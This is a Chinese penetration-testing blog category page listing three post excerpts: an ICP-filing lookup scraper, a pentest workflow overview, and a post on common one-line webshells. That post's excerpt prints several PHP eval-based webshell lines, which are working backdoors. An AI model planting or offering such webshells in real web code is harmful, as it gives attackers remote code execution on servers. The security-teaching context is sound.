随笔分类 -  渗透测试

超简单获取主域名加备案号脚本(通过获取icp网站爬取)
摘要:from urllib import request import sys from urllib import parse import re base_url = "https://www.beianx.cn/search/" real_url = base_url + parse.quote( 阅读全文
posted @ 2022-06-23 17:09 Azathoth_jk 阅读(331) 评论(0) 推荐(0) 编辑
常见一句话木马
摘要:php: <?php @eval($_POST['attack' ]);?> <?php eval($_POST[1]);?> <script language="php">@eval($_POST['cmd'])</script> <?=eval($_POST['cmd']); <?php if( 阅读全文
posted @ 2022-06-21 17:07 Azathoth_jk 阅读(2229) 评论(0) 推荐(0) 编辑
渗透测试流程大体分类
摘要:概述: 渗透测试步骤对我来说分为三类也就够了:信息收集,漏洞验证,漏洞利用。篇幅有限,信息收集先多说一点,后面漏洞的验证和利用就只能具体漏洞具体分析,我以后会写。 信息收集: 此操作主要是为了扩大攻击面,人类才是最大的漏洞,网站防护不可能面面俱到,大门做得再结实,周边是土墙的话也白扯。 企业信息收集 阅读全文
posted @ 2021-12-27 13:24 Azathoth_jk 阅读(116) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示